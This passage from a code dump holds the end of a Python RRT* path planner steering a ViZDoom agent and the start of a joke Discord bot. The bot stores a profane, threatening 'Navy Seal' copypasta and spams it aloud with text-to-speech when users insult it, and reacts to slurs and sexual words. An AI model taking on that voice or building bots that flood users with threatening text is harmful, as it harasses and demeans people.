(obstacles[alpha][beta] == 0 or obstacles[alpha + 1][beta] == 0 or obstacles[alpha - 1][beta] == 0 or\n obstacles[alpha][beta + 1] == 0 or obstacles[alpha][beta - 1] == 0 ):\n return True\n return False\n\n\ndef isThruObstacle(p0,p1, obstacles):\n xm = int((p0[0] + p1[0]) / 2)\n ym = int((p0[1] + p1[1]) / 2)\n if ym < 0 or ym >= 480:\n return True\n if xm < 0 or xm >= 637:\n return True\n if obstacles[ym][xm] == 0:\n return True\n xm1 = int((p0[0] + xm) / 2)\n ym1 = int((p0[1] + ym) / 2)\n if obstacles[ym1][xm1] == 0:\n return True\n xm2 = int((p1[0] + xm) / 2)\n ym2 = int((p1[1] + ym) / 2)\n if obstacles[ym2][xm2] == 0:\n return True\n if ((p1[0] - p0[0]) != 0):\n m = (p1[1] - p0[1]) / (p1[0] - p0[0])\n # for x,y in corners :\n # if(abs((y-p0[1]-m*(x-p0[0])))/(sqrt(1+m**2))<=2):\n # return True\n step = 0\n if (p1[0] > p0[0]):\n step = 1\n else:\n step = -1\n xcoord = p0[0]\n ycoord = p0[1]\n i = 1\n while ((xcoord < p1[0] and step > 0) or (xcoord > p1[0] and step < 0)):\n xcoord += step\n ycoord += m\n if (isInObstacle(Node(xcoord, ycoord), obstacles)):\n return True\n else:\n step = 0\n if (p1[1] - p0[1] >= 0):\n step = 1\n else:\n step = -1\n ycoord = p0[1]\n while ((ycoord < p1[1] and step > 0) or (ycoord > p1[1] and step < 0)):\n ycoord += step\n if (isInObstacle(Node(p0[0], ycoord), obstacles)):\n return True\n return False\n\n\nclass Node:\n x = 0\n y = 0\n cost = 0\n parent = None\n\n def __init__(self, xcoord, ycoord):\n self.x = xcoord\n self.y = ycoord\n\ndef main():\n\n pygame.init()\n screen = pygame.display.set_mode(WINSIZE)\n pygame.display.set_caption('RRTstar')\n\n white = 255, 240, 200\n black = 20, 20, 40\n screen.fill(white)\n\n nodes = []\n\n\n nodes.append(Node(449., 214.))\n start = nodes[0]\n goal = Node(494., 367.)\n for i in range(NUMNODES):\n rand = Node(random.random() * XDIM, random.random() * YDIM)\n nn = nodes[0]\n for p in nodes:\n if dist([p.x, p.y], [rand.x, rand.y]) < dist([nn.x, nn.y], [rand.x, rand.y]):\n nn = p\n interpolatedNode = step_from_to([nn.x, nn.y], [rand.x, rand.y])\n\n\n newnode = Node(interpolatedNode[0], interpolatedNode[1])\n if isInObstacle(newnode,obstacles):\n continue\n [newnode, nn] = chooseParent(nn, newnode, nodes)\n if isThruObstacle((newnode.x,newnode.y),(nn.x,nn.y),obstacles) :\n continue\n\n nodes.append(newnode)\n pygame.draw.line(screen, black, [nn.x, nn.y], [newnode.x, newnode.y])\n nodes = reWire(nodes, newnode, pygame, screen)\n pygame.display.update()\n\n\n for e in pygame.event.get():\n if e.type == QUIT or (e.type == KEYUP and e.key == K_ESCAPE):\n sys.exit(\"Leaving because you requested it.\")\n drawSolutionPath(start, goal, nodes, pygame, screen)\n for i in range(len(path) - 1):\n cv2.line(img, (int(path[i][0]), int(path[i][1])), (int(path[i + 1][0]), int(path[i + 1][1])), (0, 255, 255), 1)\n pygame.display.update()\n cv2.imshow(\"Final Path\", img)\n cv2.imwrite(\"path.jpg\",img)\n cv2.waitKey(0)\n\ndef f0(a,b) :\n if(abs(a-b)<5):\n return True\n return False\ndef f2(a,b) :\n if(abs(a-b)<5):\n return True\n return False\n\ndef f1(a,b) :\n if(abs(a-b)<0.5):\n return True\n return False\n\n\nif __name__ == '__main__':\n img = cv2.imread(\"map_fu.png\")\n\n imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n path=[]\n\n blur = cv2.GaussianBlur(imgray, (3, 3), 0)\n ret, thresh = cv2.threshold(blur, 2, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n\n obstacles = thresh\n corner = cv2.goodFeaturesToTrack(obstacles, 200, 0.01, 10)\n corner = np.int0(corner)\n corners = []\n\n\n\n main()\n path.append((449., 214.))\n 
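# drawSolutionPath() traced `path` from the node nearest the goal back toward the start\n    # (the start point was appended just above), so reverse into start-to-goal order and append the goal.\n    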
path.reverse()\n path.append((494., 367.))\n\n\n running = True\n while running:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n\n\n game = vzd.DoomGame()\n\n\n game.set_doom_scenario_path(os.path.join(vzd.scenarios_path, \"s.wad\"))\n\n\n game.set_doom_map(\"map01\")\n\n\n game.set_screen_resolution(vzd.ScreenResolution.RES_640X480)\n\n\n game.set_screen_format(vzd.ScreenFormat.BGR24)\n\n\n\n\n game.set_automap_buffer_enabled(True)\n game.set_automap_mode(vzd.AutomapMode.OBJECTS)\n\n\n game.set_objects_info_enabled(True)\n\n\n game.set_sectors_info_enabled(True)\n\n\n game.set_render_hud(False)\n game.set_render_minimal_hud(False)\n game.set_render_crosshair(False)\n game.set_render_weapon(True)\n game.set_render_decals(False)\n game.set_render_particles(False)\n game.set_render_effects_sprites(False)\n game.set_render_messages(False)\n game.set_render_corpses(False)\n game.set_render_screen_flashes(True)\n\n\n game.set_available_buttons([vzd.Button.MOVE_FORWARD, vzd.Button.TURN_LEFT, vzd.Button.TURN_RIGHT,vzd.Button.MOVE_LEFT,vzd.Button.MOVE_RIGHT])\n\n print(\"Available buttons:\", [b.name for b in game.get_available_buttons()])\n\n\n game.set_available_game_variables([vzd.GameVariable.AMMO2])\n print(\"Available game variables:\", [v.name for v in game.get_available_game_variables()])\n\n\n game.set_episode_timeout(2500)\n\n\n game.set_episode_start_time(10)\n\n\n game.add_available_game_variable(vzd.GameVariable.POSITION_X)\n game.add_available_game_variable(vzd.GameVariable.POSITION_Y)\n game.add_available_game_variable(vzd.GameVariable.ANGLE)\n game.set_window_visible(True)\n\n\n\n\n game.set_living_reward(-1)\n\n\n game.set_mode(vzd.Mode.PLAYER)\n\n\n\n\n game.init()\n if(len(path)==2):\n game.close()\n\n\n actions = [[True, False, False,False,False], [False, True, False,False,False], [False, False, True,False,False],[False, False, False,True,False],[False, False, False,False,True]]\n\n\n episodes = 1\n\n c = 10.99853611\n\n prev_angle=0\n prev_x=0\n prev_y=0\n prev2_x=0\n prev2_y=-64\n i=0\n\n\n sleep_time = 1.0 / vzd.DEFAULT_TICRATE # = 0.028\n\n for i in range(episodes):\n print(\"Episode #\" + str(i + 1))\n\n\n game.new_episode()\n sum = 0\n\n\n x1=0\n y1=-64\n\n p=0\n\n for x,y in path:\n\n\n x=(x-449)*c\n y=(214-y)*c-64\n\n if(x==449 and y==214):\n x1=0\n y1=-64\n continue\n\n\n while f0(x1,x)==False or f0(y,y1)==False :\n\n state = game.get_state()\n\n\n n = state.number\n vars = state.game_variables\n screen_buf = state.screen_buffer\n depth_buf = state.depth_buffer\n labels_buf = state.labels_buffer\n automap_buf = state.automap_buffer\n labels = state.labels\n objects = state.objects\n sectors = state.sectors\n\n\n\n\n\n\n an= atan2(y-vars[2] , x-vars[1] )\n ang= math.degrees(an)\n if(ang<0):\n ang= ang +360\n\n p = vars[1]\n q = vars[2]\n l=0\n r=0\n if vars[3] 0:\n sleep(sleep_time)\n\n\n print(\"Episode finished.\")\n print(\"Total reward:\", game.get_total_reward())\n print(\"************************\")\n\n\n game.close()","repo_name":"OmSadhwani/AGV-selection-tasks","sub_path":"RRT/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":11745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28484771556","text":"# -----------------------------------------------------------------------\r\n# Cli-Bot - discord bot dedicated to shit posting and other fun\r\n# Authors: WhiteTrick\r\n# Contributors: v0idbit\r\n# 
-----------------------------------------------------------------------\r\n# import packages\r\nimport discord\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import bot # discord API\r\nfrom discord import opus\r\nimport logging # used for logging errors\r\nfrom math import e\r\nimport matplotlib.pyplot as plt\r\nimport numexpr as ne\r\nimport numpy as np\r\n# import opus #necessary for using voice channel\r\nfrom random import randint # generate pseudorandom numbers\r\nimport re\r\nimport os\r\nimport string\r\nimport asyncio\r\nfrom functools import reduce\r\n\r\n# -----------------------------------------------------------------------\r\nmarine1 = \"What the fuck did you just fucking say about me, you little bitch?\"\r\nmarine2 = \"I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous \" \\\r\n          \"secret raids on Al-Quaeda, and I have over 300 confirmed kills. \"\r\nmarine3 = \"I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to \" \\\r\n          \"me but just another target. \"\r\nmarine4 = \"I will wipe you the fuck out with precision the likes of which has never been seen before on this Earth, \" \\\r\n          \"mark my fucking words. \"\r\nmarine5 = 'You think you can get away with saying that shit to me over the Internet?'\r\nmarine6 = \"Think again, fucker. As we speak I am contacting my secret network of spies across the USA and your IP is \" \\\r\n          \"being traced right now so you better prepare for the storm, maggot. \"\r\nmarine7 = \"The storm that wipes out the pathetic little thing you call your life.\"\r\nmarine8 = \"You’re fucking dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, \" \\\r\n          \"and that’s just with my bare hands. \"\r\nmarine9 = \"Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United \" \\\r\n          \"States Marine Corps \"\r\nmarine10 = \"and I will use it to its full extent to wipe your miserable ass off the face of the continent, you little \" \\\r\n           \"shit. \"\r\nmarine11 = 'If only you could have known what unholy retribution your little “clever” comment was about to bring down ' \\\r\n           'upon you, maybe you would have held your fucking tongue. '\r\nmarine12 = \"But you couldn’t, you didn’t, and now you’re paying the price, you goddamn idiot. I will shit fury all \" \\\r\n           \"over you and you will drown in it. You’re fucking dead, kiddo. \"\r\nmarinepasta = [marine1, marine2, marine3, marine4, marine5, marine6, marine7, marine8, marine9, marine10, marine11,\r\n               marine12]\r\n\r\n# set logging level: logs to Command Line Interface\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\n# instantiate client\r\nclibot = discord.Client(max_messages=10000)\r\n\r\nOPUS_LIBS = ['libopus-0.x86.dll', 'libopus-0.x64.dll', 'libopus-0.dll',\r\n             'libopus.so.0', 'libopus.0.dylib']\r\n\r\n\r\ndef GCD(a, b):\r\n    if (a < b):\r\n        A = a\r\n        R = B = b\r\n    else:\r\n        A = b\r\n        R = B = a\r\n    while (R != 0):\r\n        R = A % B\r\n        if (R == 0):\r\n            return B\r\n        A = B\r\n        B = R
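\r\n\r\n# Worked example with made-up numbers: reduce(GCD, (12, 18, 24)) returns 6, because\r\n# GCD(12, 18) = 6 and then GCD(6, 24) = 6 -- the #gcd command below chains pairs exactly this way.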
\r\n\r\nremove_punctuation = str.maketrans('', '', string.punctuation)\r\n\r\n\r\ndef load_opus_lib(opus_libs=OPUS_LIBS):\r\n    \"\"\" loads opus lib \"\"\"\r\n    if opus.is_loaded():\r\n        return True\r\n\r\n    for opus_lib in opus_libs:\r\n        try:\r\n            opus.load_opus(opus_lib)\r\n            return\r\n        except OSError:\r\n            pass\r\n\r\n    raise RuntimeError('Could not load an opus lib. Tried %s' % (', '.join(opus_libs)))\r\n\r\n\r\nbot = commands.Bot(command_prefix='#')\r\n\r\n# initialize game that Clibot will be playing\r\nplaying_game = discord.Game(name=\"with myself\")\r\n\r\n\r\n# global voice\r\n# global player\r\n\r\n@clibot.event\r\nasync def on_ready():\r\n    \"\"\" called when clibot finishes preparing data received from Discord \"\"\"\r\n    print('Logged in as')\r\n    print(clibot.user.name)\r\n    print(clibot.user.id)\r\n    print('--------')\r\n    print('invite URL')\r\n    print(discord.utils.oauth_url('352256816790503425'))\r\n    load_opus_lib()\r\n    await clibot.change_presence(game=playing_game)\r\n\r\n\r\n'''\r\n\r\n'''\r\n\r\n\r\n@bot.command(pass_context=True)\r\nasync def gcd(ctx, arg):\r\n    mytuple = tuple([int(word) for word in arg.translate(remove_punctuation).split(\" \")])\r\n    output = reduce(GCD, mytuple)\r\n    embed = discord.Embed(color=0x00ff00)\r\n    embed.add_field(name=\"Greatest Common Divisor\", value=\"GCD{} = {}\".format(mytuple, output))\r\n    await clibot.send_message(ctx.message.channel, embed=embed)\r\n\r\n\r\n@clibot.event\r\nasync def on_message_delete(message):\r\n    \"\"\" called when a message is deleted. Keyword arguments: message -- the message (object) deleted \"\"\"\r\n    if len(message.content) > 0 and message.author.name != \"cli-bot\":\r\n        author = message.author.name\r\n        content = message.clean_content\r\n        print('{}\\'s message \"*{}*\" was deleted.'.format(author, content))\r\n\r\n\r\n@clibot.event\r\nasync def on_message(message):\r\n    await bot.process_commands(message)\r\n    spongerob = randint(1, 100)\r\n    kisses = randint(1, 100)\r\n    if (len(message.content) > 0 and spongerob == 1\r\n            and message.author.name != \"cli-bot\"):\r\n        # 1% chance of cli-bot mocking a non-blank message, given\r\n        # it's not from cli-bot itself\r\n        msg = message.clean_content\r\n        print(msg)\r\n        new_msg = list(msg)\r\n\r\n        for i in range(0, len(msg)):\r\n            # iterates over the message as a char array and swaps the\r\n            # case of alpha characters ~67% of the time\r\n            r = randint(1, 3)\r\n            if r <= 2:\r\n                if new_msg[i].isupper():\r\n                    # swap from upper to lower\r\n                    new_msg[i] = new_msg[i].lower()\r\n                else:\r\n                    # swap from lower to upper\r\n                    new_msg[i] = new_msg[i].upper()\r\n\r\n        new_msg = \"\".join(new_msg) # joins char array back into string\r\n        file = './spongerob.jpg'\r\n        await clibot.send_file(message.channel, file,\r\n                               content=new_msg, tts=True)\r\n    if (len(message.content) > 0 and (kisses in range(1, 4))\r\n            and message.author.name != \"cli-bot\"):\r\n        await clibot.add_reaction(message, '\\U0001F48b')\r\n\r\n    if re.search(r'cunt', message.content, re.I) and message.author.name != 'cli-bot':\r\n        # adds some much needed emphasis to messages including the word\r\n        # \"cunt\"\r\n        await clibot.add_reaction(message, '\\U0001F1E8')\r\n        await clibot.add_reaction(message, '\\U0001F1FA')\r\n        await clibot.add_reaction(message, '\\U0001F1F3')\r\n        await clibot.add_reaction(message, '\\U0001F1F9')\r\n\r\n    # if (any(word in ['cli', 'clibot', 'cli-bot'] for word in\r\n    #         message.content.lower().translate(remove_punctuation).split())\r\n    #         and message.author.name != \"cli-bot\"):\r\n    if re.search(r\"cli\", message.content, re.I) and message.author.name != \"cli-bot\":\r\n        if re.search(r\"l[ou]v\", message.content, re.I):\r\n            await clibot.add_reaction(message, '\\U0001F633')\r\n        if re.search(r\"hate|h8|fuck you\", message.content, re.I):\r\n            await clibot.add_reaction(message, emoji=':absoluteshit:296132005203148800')\r\n            for marine in marinepasta:\r\n                await 
clibot.send_message(message.channel, marine, tts=True)\r\n if (\r\n any(word in ['annoy', 'annoying'] for word in\r\n message.content.lower().translate(remove_punctuation).split())):\r\n await clibot.add_reaction(message, '😘')\r\n\r\n if re.match(r\".*sex.*|.*fuck.*|.*penetra.*\", message.content, re.I) and message.author.name != \"cli-bot\":\r\n await clibot.add_reaction(message, '👉🏿')\r\n await clibot.add_reaction(message, '👌🏻')\r\n\r\n # if ('better' in message.content.lower().translate(remove_punctuation).split()\r\n # and 'idea' in message.content.lower().translate(remove_punctuation).split()\r\n if re.search(r\"better.*idea|idea.*better\", message.content, re.I) and message.author.name != \"cli-bot\":\r\n await clibot.add_reaction(message, emoji=':helno:370408318352490496')\r\n\r\n # if ('make you jizz' in message.content.lower().translate(remove_punctuation) and message.author.name != 'cli-bot'):\r\n if re.search(r\"make you jizz\", message.content, re.I):\r\n await clibot.send_message(message.channel, 'cuzzi with me tonight')\r\n\r\n matchObj = re.match(r'^cli-plot ([^=]+)=([\\d\\+\\-\\*\\%/\\^()\\.[a-zA-Z]+);?\\s?(xlab=\\'[^,]*\\')?,?\\s?(ylab=\\'[^,]*\\')?,?\\s?(title=\\'[^,]*\\')?,?\\s?(range\\(([\\+\\-]?[(\\d*\\.?\\d*)|(\\d*)]{1,}),\\s?([\\+\\-]?[(\\d*\\.?\\d*)|(\\d*)]{1,})\\))?,?\\s?(--autoscale)?$', message.content, re.I)\r\n if matchObj:\r\n # cli-plot event\r\n # cli-plot =; xlab='